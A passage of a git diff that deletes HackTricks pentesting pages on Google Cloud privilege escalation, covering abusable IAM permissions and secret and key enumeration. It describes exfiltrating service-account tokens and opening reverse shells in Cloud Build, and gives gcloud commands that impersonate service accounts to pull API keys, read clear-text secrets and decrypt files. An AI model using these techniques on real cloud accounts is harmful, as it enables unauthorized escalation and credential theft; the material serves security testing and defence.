-Like in the exploitation of [**iam.serviceAccounts.setIamPolicy**](gcp-privesc-to-other-principals.md#iam.serviceaccounts.setiampolicy), this permission allows you to **modify** your **permissions** against **any resource** at **organization** level. So, you can follow the same exploitation example.
-
-## resourcemanager.folders.setIamPolicy
-
-Like in the exploitation of [**iam.serviceAccounts.setIamPolicy**](gcp-privesc-to-other-principals.md#iam.serviceaccounts.setiampolicy), this permission allows you to **modify** your **permissions** against **any resource** at **folder** level. So, you can follow the same exploitation example.
-
-## resourcemanager.projects.setIamPolicy
-
-Like in the exploitation of [**iam.serviceAccounts.setIamPolicy**](gcp-privesc-to-other-principals.md#iam.serviceaccounts.setiampolicy), this permission allows you to **modify** your **permissions** against **any resource** at **project** level. So, you can follow the same exploitation example.
-
-# deploymentmanager
-
-## deploymentmanager.deployments.create
-
-This single permission lets you **launch new deployments** of resources into GCP with arbitrary service accounts. You could for example launch a compute instance with a SA to escalate to it.
-
-You could actually **launch any resource** listed in `gcloud deployment-manager types list`
-
-In the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) following[ **script**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/deploymentmanager.deployments.create.py) is used to deploy a compute instance, however that script won't work. Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/1-deploymentmanager.deployments.create.sh)**.**
-
-## deploymentmanager.deployments.**update**
-
-This is like the previous abuse but instead of creating a new deployment, you modifies one already existing (so be careful)
-
-Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/e-deploymentmanager.deployments.update.sh)**.**
-
-## deploymentmanager.deployments.**setIamPolicy**
-
-This is like the previous abuse but instead of directly creating a new deployment, you first give you that access and then abuses the permission as explained in the previos _deploymentmanager.deployments.create_ section.
-
-# cloudbuild
-
-## cloudbuild.builds.create
-
-With this permission you can **submit a cloud build**. The cloudbuild machine will have in itβs filesystem by **default a token of the powerful cloudbuild Service Account**: `@cloudbuild.gserviceaccount.com` . However, you can **indicate any service account inside the project** in the cloudbuild configuration.\
-Therefore, you can just make the machine exfiltrate to your server the token or **get a reverse shell inside of it and get yourself the token** (the file containing the token might change).
-
-You can find the original exploit script [**here on GitHub**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudbuild.builds.create.py) (but the location it's taking the token from didn't work for me). Therefore, check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/f-cloudbuild.builds.create.sh) and a python script to get a reverse shell inside of the cloudbuild machine and [**steal it here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/f-cloudbuild.builds.create.py) (in the code you can find how to specify other service accounts)**.**
-
-For a more in-depth explanation visit [https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/](https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/)
-
-## cloudbuild.builds.update
-
-**Potentially** with this permission you will be able to **update a cloud build and just steal the service account token** like it was performed with the previous permission (but unfortunately at the time of this writing I couldn't find any way to call that API).
-
-# compute
-
-## compute.projects.setCommonInstanceMetadata
-
-With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with.\
-Limitations:
-
-* Note that GCP Service Accounts running in VM instances by default have a **very limited scope**
-* You will need to be **able to contact the SSH** server to login
-
-For more information about how to exploit this permission check:
-
-{% content-ref url="../gcp-local-privilege-escalation-ssh-pivoting.md" %}
-[gcp-local-privilege-escalation-ssh-pivoting.md](../gcp-local-privilege-escalation-ssh-pivoting.md)
-{% endcontent-ref %}
-
-## compute.instances.setMetadata
-
-This permission gives the **same privileges as the previous permission** but over a specific instances instead to a whole project. The **same exploits and limitations applies**.
-
-## compute.instances.setIamPolicy
-
-This kind of permission will allow you to **grant yourself a role with the previous permissions** and escalate privileges abusing them.
-
-## **compute.instances.osLogin**
-
-If OSLogin is enabled in the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You won't have root privs inside the instance.
-
-## **compute.instances.osAdminLogin**
-
-If OSLogin is enabled in the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You will have root privs inside the instance.
-
-# container
-
-## container.clusters.get
-
-This permission allows to **gather credentials for the Kubernetes cluster** using something like:
-
-```bash
-gcloud container clusters get-credentials --zone
-```
-
-Without extra permissions, the credentials are pretty basic as you can **just list some resource**, but hey are useful to find miss-configurations in the environment.
-
-{% hint style="info" %}
-Note that **kubernetes clusters might be configured to be private**, that will disallow that access to the Kube-API server from the Internet.
-{% endhint %}
-
-## container.clusters.getCredentials
-
-Apparently this permission might be useful to gather auth credentials (basic auth method isn't supported anymore by GKE if you use the latest GKE versions).
-
-## container.roles.escalate/container.clusterRoles.escalate
-
-**Kubernetes** by default **prevents** principals from being able to **create** or **update** **Roles** and **ClusterRoles** with **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update Roles/ClusterRoles with more permissions** that ones he held, effectively bypassing the Kubernetes protection against this behaviour.
-
-**container.roles.create** and/or **container.roles.update** OR **container.clusterRoles.create** and/or **container.clusterRoles.update** respectively are also **necessary** to perform those privilege escalation actions.\
-
-
-## container.roles.bind/container.clusterRoles.bind
-
-**Kubernetes** by default **prevents** principals from being able to **create** or **update** **RoleBindings** and **ClusterRoleBindings** to give **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update RolesBindings/ClusterRolesBindings with more permissions** that ones he has, effectively bypassing the Kubernetes protection against this behaviour.
-
-**container.roleBindings.create** and/or **container.roleBindings.update** OR **container.clusterRoleBindings.create** and/or **container.clusterRoleBindings.update** respectively are also **necessary** to perform those privilege escalation actions.
-
-## container.cronJobs.create, container.cronJobs.update container.daemonSets.create, container.daemonSets.update container.deployments.create, container.deployments.update container.jobs.create, container.jobs.update container.pods.create, container.pods.update container.replicaSets.create, container.replicaSets.update container.replicationControllers.create, container.replicationControllers.update container.scheduledJobs.create, container.scheduledJobs.update container.statefulSets.create, container.statefulSets.update
-
-All these permissions are going to allow you to **create or update a resource** where you can **define** a **pod**. Defining a pod you can **specify the SA** that is going to be **attached** and the **image** that is going to be **run**, therefore you can run an image that is going to **exfiltrate the token of the SA to your server** allowing you to escalate to any service account.\
-For more information check:
-
-{% content-ref url="../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/" %}
-[abusing-roles-clusterroles-in-kubernetes](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/)
-{% endcontent-ref %}
-
-As we are in a GCP environment, you will also be able to **get the nodepool GCP SA** from the **metadata** service and **escalate privileges in GC**P (by default the compute SA is used).
-
-## container.secrets.get, container.secrets.list
-
-As [**explained in this page**](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/#listing-secrets), with these permissions you can **read** the **tokens** of all the **SAs of kubernetes**, so you can escalate to them.
-
-## container.pods.exec
-
-With this permission you will be able to **exec into pods**, which gives you **access** to all the **Kubernetes SAs running in pods** to escalate privileges within K8s, but also you will be able to **steal** the **GCP Service Account** of the **NodePool**, **escalating privileges in GCP**.
-
-## container.pods.portForward
-
-As [**explained in this page**](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/#port-forward), with these permissions you can **access local services** running in **pods** that might allow you to **escalate privileges in Kubernetes** (and in **GCP** if somehow you manage to talk to the metadata service)**.**
-
-## container.serviceAccounts.createToken
-
-Because of the **name** of the **permission**, it **looks like that it will allow you to generate tokens of the K8s Service Accounts**, so you will be able to **privesc to any SA** inside Kubernetes. However, I couldn't find any API endpoint to use it, so let me know if you find it.
-
-## container.mutatingWebhookConfigurations.create, container.mutatingWebhookConfigurations.update
-
-These permissions might allow you to escalate privileges in Kubernetes, but more probably, you could abuse them to **persist in the cluster**.\
-For more information [**follow this link**](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/#malicious-admission-controller).
-
-# storage
-
-## storage.hmacKeys.create
-
-There is a feature of Cloud Storage, βinteroperabilityβ, that provides a way for Cloud Storage to interact with storage offerings from other cloud providers, like AWS S3. As part of that, there are HMAC keys that can be created for both Service Accounts and regular users. We can **escalate Cloud Storage permissions by creating an HMAC key for a higher-privileged Service Account**.
-
-HMAC keys belonging to your user cannot be accessed through the API and must be accessed through the web console, but whatβs nice is that both the access key and secret key are available at any point. This means we could take an existing pair and store them for backup access to the account. HMAC keys belonging to Service Accounts **can** be accessed through the API, but after creation, you are not able to see the access key and secret again.
-
-![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image2-1.png)
-
-The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py).
-
-## storage.objects.get
-
-This permission allows you to **download files stored inside Gcp Storage**. This will potentially allow you to escalate privileges because in some occasions **sensitive information is saved there**. Moreover, some Gcp services stores their information in buckets:
-
-* **GCP Composer**: When you create a Composer Environment the **code of all the DAGs** will be saved inside a **bucket**. These tasks might contain interesting information inside of their code.
-* **GCR (Container Registry)**: The **image** of the containers are stored inside **buckets**, which means that if you can read the buckets you will be able to download the images and **search for leaks and/or source code**.
-
-## storage.objects.create, storage.objects.delete
-
-In order to **create a new object** inside a bucket you need `storage.objects.create` and, according to [the docs](https://cloud.google.com/storage/docs/access-control/iam-permissions#object\_permissions), you need also `storage.objects.delete` to **modify** an existent object.
-
-A very **common exploitation** of buckets where you can write in cloud is in case the **bucket is saving web server files**, you might be able to **store new code** that will be used by the web application.
-
-Moreover, several GCP services also **store code inside buckets** that later is **executed**:
-
-* **GCP Composer**: The **DAG code** is **stored in GCP Storage**. This **code** is later **executed** inside the **K8s environment** used by composer, and has also **access to a GCP SA**. Therefore, modifying this code you might be able to get inside the composer k8s env and steal the token of the GCP SA used.
-* **GCR (Container Registry)**: The **container images are stored inside buckets**. So if you have write access over them, you could **modify the images** and execute your own code whenever that container is used.
- * The bucket used by GCR will have an URL similar to `gs://.artifacts..appspot.com` (The top level subdomains are specified [here](https://cloud.google.com/container-registry/docs/pushing-and-pulling)).
-
-## storage.objects.setIamPolicy
-
-You can give you permission to **abuse any of the previous scenarios of this section**.
-
-# storage.objects Write permission
-
-If you can modify or add objects in buckets you might be able to escalate your privileges to other resources that are using the bucket to store code that they execute.
-
-## Composer
-
-**Composer** is **Apache Airflow** managed inside GCP. It has several interesting features:
-
-* It runs inside a **GKE cluster**, so the **SA the cluster uses is accesible** by the code running inside Composer
-* It stores the **code in a bucket**, therefore, **anyone with write access over that bucket** is going to be able change/add a DGA code (the code Apache Airflow will execute)\
- Then, if you have **write access over the bucket Composer is using** to store the code you can **privesc to the SA running in the GKE cluster**.
-
-# References
-
-* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
-* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner)
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
diff --git a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-resources.md b/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-resources.md
deleted file mode 100644
index 331a448f0..000000000
--- a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-resources.md
+++ /dev/null
@@ -1,269 +0,0 @@
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
-# cloudfunctions
-
-## cloudfunctions.functions.create,iam.serviceAccounts.actAs
-
-For this method, we will be **creating a new Cloud Function with an associated Service Account** that we want to gain access to. Because Cloud Function invocations have **access to the metadata** API, we can request a token directly from it, just like on a Compute Engine instance.
-
-The **required permissions** for this method are as follows:
-
-* _cloudfunctions.functions.call_ **OR** _cloudfunctions.functions.setIamPolicy_
-* _cloudfunctions.functions.create_
-* _cloudfunctions.functions.sourceCodeSet_
-* _iam.serviceAccounts.actAs_
-
-The script for this method uses a premade Cloud Function that is included on GitHub, meaning you will need to upload the associated .zip file and make it public on Cloud Storage (see the exploit script for more information). Once the function is created and uploaded, you can either invoke the function directly or modify the IAM policy to allow you to invoke the function. The response will include the access token belonging to the Service Account assigned to that Cloud Function.
-
-![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image12-750x618.png)
-
-The script creates the function and waits for it to deploy, then it runs it and gets returned the access token.
-
-The exploit scripts for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-call.py) and [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-setIamPolicy.py) and the prebuilt .zip file can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudFunctions).
-
-## cloudfunctions.functions.update,iam.serviceAccounts.actAs
-
-Similar to _cloudfunctions.functions.create_, this method **updates (overwrites) an existing function instead of creating a new one**. The API used to update the function also allows you to **swap the Service Account if you have another one you want to get the token for**. The script will update the target function with the malicious code, then wait for it to deploy, then finally invoke it to be returned the Service Account access token.
-
-The following **permissions are required** for this method:
-
-* _cloudfunctions.functions.sourceCodeSet_
-* _cloudfunctions.functions.update_
-* _iam.serviceAccounts.actAs_
-
-The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.update.py).
-
-# compute
-
-## compute.instances.create,iam.serviceAccounts.actAs
-
-This method **creates a new Compute Engine instance with a specified Service Account**, then **sends the token** belonging to that Service Account to an **external server.**
-
-The following **permissions are required** for this method:
-
-* _compute.disks.create_
-* _compute.instances.create_
-* _compute.instances.setMetadata_
-* _compute.instances.setServiceAccount_
-* _compute.subnetworks.use_
-* _compute.subnetworks.useExternalIp_
-* _iam.serviceAccounts.actAs_
-
-![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image9-750x594.png)
-
-The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/compute.instances.create.py).
-
-# run
-
-## run.services.create,iam.serviceAccounts.actAs
-
-Similar to the _cloudfunctions.functions.create_ method, this method creates a **new Cloud Run Service** that, when invoked, **returns the Service Accountβs** access token by accessing the metadata API of the server it is running on. A Cloud Run service will be deployed and a request can be performed to it to get the token.
-
-The following **permissions are required** for this method:
-
-* _run.services.create_
-* _iam.serviceaccounts.actAs_
-* _run.services.setIamPolicy_ **OR** _run.routes.invoke_
-
-![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image8-1000x503.png)
-
-This method uses an included Docker image that must be built and hosted to exploit correctly. The image is designed to tell Cloud Run to respond with the Service Accountβs access token when an HTTP request is made.
-
-The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/run.services.create.py) and the Docker image can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudRunDockerImage).
-
-# Cloudscheduler
-
-## cloudscheduler.jobs.create,iam.serviceAccounts.actAs
-
-Cloud Scheduler allows you to set up cron jobs targeting arbitrary HTTP endpoints. **If that endpoint is a \*.googleapis.com endpoint**, then you can also tell Scheduler that you want it to authenticate the request **as a specific Service Account**, which is exactly what we want.
-
-Because we control all aspects of the HTTP request being made from Cloud Scheduler, we can set it up to hit another Google API endpoint. For example, if we wanted to create a new job that will use a specific Service Account to create a new Storage bucket on our behalf, we could run the following command:
-
-```
-gcloud scheduler jobs create http test βschedule=β* * * * *β βuri=βhttps://storage.googleapis.com/storage/v1/b?project=β βmessage-body β{βnameβ:βnew-bucket-nameβ}β βoauth-service-account-email 111111111111-compute@developer.gserviceaccount.com βheaders Content-Type=application/json
-```
-
-This command would schedule an HTTP POST request for every minute that authenticates as _111111111111-compute@developer.gserviceaccount.com_. The request will hit the Cloud Storage API endpoint and will create a new bucket with the name βnew-bucket-nameβ.
-
-The following permissions are required for this method:
-
-* _cloudscheduler.jobs.create_
-* _cloudscheduler.locations.list_
-* _iam.serviceAccounts.actAs_
-
-To escalate our privileges with this method, we just need to **craft the HTTP request of the API we want to hit as the Service Account we pass in**. Instead of a script, you can just use the gcloud command above.
-
-A similar method may be possible with Cloud Tasks, but we were not able to do it in our testing.
-
-# orgpolicy
-
-## orgpolicy.policy.set
-
-This method does **not necessarily grant you more IAM permissions**, but it may **disable some barriers** that are preventing certain actions. For example, there is an Organization Policy constraint named _appengine.disableCodeDownload_ that prevents App Engine source code from being downloaded by users of the project. If this was enabled, you would not be able to download that source code, but you could use _orgpolicy.policy.set_ to disable the constraint and then continue with the source code download.
-
-![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image5-1.png)
-
-The screenshot above shows that the _appengine.disableCodeDownload_ constraint is enforced, which means it is preventing us from downloading the source code. Using _orgpolicy.policy.set_, we can disable that enforcement and then continue on to download the source code.
-
-The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/orgpolicy.policy.set.py).
-
-# serviceusage
-
-The following permissions are useful to create and steal API keys, not this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._
-
-Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges.
-
-## serviceusage.apiKeys.create
-
-There is another method of authenticating with GCP APIs known as API keys. By default, they are created with no restrictions, which means they have access to the entire GCP project they were created in. We can capitalize on that fact by creating a new API key that may have more privileges than our own user. There is no official API for this, so a custom HTTP request needs to be sent to _https://apikeys.clients6.google.com/_ (or _https://apikeys.googleapis.com/_). This was discovered by monitoring the HTTP requests and responses while browsing the GCP web console. For documentation on the restrictions associated with API keys, visit [this link](https://cloud.google.com/docs/authentication/api-keys).
-
-The following screenshot shows how you would create an API key in the web console.
-
-![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image6-1.png)
-
-With the undocumented API that was discovered, we can also create API keys through the API itself.
-
-The screenshot above shows a POST request being sent to retrieve a new API key for the project.
-
-The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/serviceusage.apiKeys.create.py).
-
-## serviceusage.apiKeys.list
-
-Another undocumented API was found for listing API keys that have already been created (this can also be done in the web console). Because you can still see the API keyβs value after its creation, we can pull all the API keys in the project.
-
-![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image4-1.png)
-
-The screenshot above shows that the request is exactly the same as before, it just is a GET request instead of a POST request. This only shows a single key, but if there were additional keys in the project, those would be listed too.
-
-The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/serviceusage.apiKeys.list.py).
-
-# apikeys
-
-The following permissions are useful to create and steal API keys, not this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._
-
-Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges.
-
-## apikeys.keys.create
-
-This permission allows to **create an API key**:
-
-```bash
-gcloud alpha services api-keys create
-Operation [operations/akmf.p7-[...]9] complete. Result: {
- "@type":"type.googleapis.com/google.api.apikeys.v2.Key",
- "createTime":"2022-01-26T12:23:06.281029Z",
- "etag":"W/\"HOhA[...]==\"",
- "keyString":"AIzaSy[...]oU",
- "name":"projects/5[...]6/locations/global/keys/f707[...]e8",
- "uid":"f707[...]e8",
- "updateTime":"2022-01-26T12:23:06.378442Z"
-}
-```
-
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/b-apikeys.keys.create.sh).
-
-## apikeys.keys.getKeyString,apikeys.keys.list
-
-These permissions allows **list and get all the apiKeys and get the Key**:
-
-```bash
-gcloud alpha services api-keys create
-for key in $(gcloud --impersonate-service-account="${SERVICE_ACCOUNT_ID}@${PROJECT_ID}.iam.gserviceaccount.com" alpha services api-keys list --uri); do
- gcloud --impersonate-service-account="${SERVICE_ACCOUNT_ID}@${PROJECT_ID}.iam.gserviceaccount.com" alpha services api-keys get-key-string "$key"
-done
-```
-
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/c-apikeys.keys.getKeyString.sh).
-
-## apikeys.keys.regenerate,apikeys.keys.list
-
-These permissions will (potentially) allow you to **list and regenerate all the apiKeys getting the new Key**.\
-Itβs not possible to use this from `gcloud` but you probably can use it via the API. Once itβs supported, the exploitation will be similar to the previous one (I guess).
-
-## apikeys.keys.lookup
-
-This is extremely useful to check to **which GCP project an API key that you have found belongs to**:
-
-```bash
-gcloud alpha services api-keys lookup AIzaSyD[...]uE8Y
-name: projects/5[...]6/locations/global/keys/28d[...]e0e
-parent: projects/5[...]6/locations/global
-```
-
-In this scenario it could also be interesting to run the tool [https://github.com/ozguralp/gmapsapiscanner](https://github.com/ozguralp/gmapsapiscanner) and check what you can access with the API key
-
-# secretmanager
-
-## secretmanager.secrets.get
-
-This give you access to read the secrets from the secret manager.
-
-## secretmanager.secrets.setIamPolicy
-
-This give you access to give you access to read the secrets from the secret manager.
-
-# \*.setIamPolicy
-
-If you owns a user that has the **`setIamPolicy`** permission in a resource you can **escalate privileges in that resource** because you will be able to change the IAM policy of that resource and give you more privileges over it.
-
-* _cloudfunctions.functions.setIamPolicy_
- * Modify the policy of a Cloud Function to allow yourself to invoke it.
-
-There are tens of resources types with this kind of permission, you can find all of them in [https://cloud.google.com/iam/docs/permissions-reference](https://cloud.google.com/iam/docs/permissions-reference) searching for setIamPolicy.
-
-An **example** of privilege escalation abusing .setIamPolicy (in this case in a bucket) can be found here:
-
-{% content-ref url="../gcp-buckets-brute-force-and-privilege-escalation.md" %}
-[gcp-buckets-brute-force-and-privilege-escalation.md](../gcp-buckets-brute-force-and-privilege-escalation.md)
-{% endcontent-ref %}
-
-# Generic Interesting Permissions
-
-## \*.create, \*.update
-
-These permissions can be very useful to try to escalate privileges in resources by **creating a new one or updating a new one**. These can of permissions are specially useful if you also has the permission **iam.serviceAccounts.actAs** over a Service Account and the resource you have .create/.update over can attach a service account.
-
-## \*ServiceAccount\*
-
-This permission will usually let you **access or modify a Service Account in some resource** (e.g.: compute.instances.setServiceAccount). This **could lead to a privilege escalation** vector, but it will depend on each case.
-
-# References
-
-* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
-* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner)
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
diff --git a/cloud-security/gcp-security/gcp-kms-and-secrets-management-enumeration.md b/cloud-security/gcp-security/gcp-kms-and-secrets-management-enumeration.md
deleted file mode 100644
index f79ceab6a..000000000
--- a/cloud-security/gcp-security/gcp-kms-and-secrets-management-enumeration.md
+++ /dev/null
@@ -1,76 +0,0 @@
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
-# Crypto Keys
-
-[Cloud Key Management Service](https://cloud.google.com/kms/docs/) is a repository for storing cryptographic keys, such as those used to **encrypt and decrypt sensitive files**. Individual keys are stored in key rings, and granular permissions can be applied at either level.
-
-Having **permissions to list the keys** this is how you can access them:
-
-```bash
-# List the global keyrings available
-gcloud kms keyrings list --location global
-
-# List the keys inside a keyring
-gcloud kms keys list --keyring [KEYRING NAME] --location global
-
-# Decrypt a file using one of your keys
-gcloud kms decrypt --ciphertext-file=[INFILE] \
- --plaintext-file=[OUTFILE] \
- --key [KEY] \
- --keyring [KEYRING] \
- --location global
-```
-
-# Secrets Management
-
-Google [Secrets Management](https://cloud.google.com/solutions/secrets-management/) is a vault-like solution for storing passwords, API keys, certificates, and other sensitive data. As of this writing, it is currently in beta.
-
-```bash
-# First, list the entries
-gcloud beta secrets list
-
-# Then, pull the clear-text of any secret
-gcloud beta secrets versions access 1 --secret="[SECRET NAME]"
-```
-
-Note that changing a secret entry will create a new version, so it's worth changing the `1` in the command above to a `2` and so on.
-
-# References
-
-* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
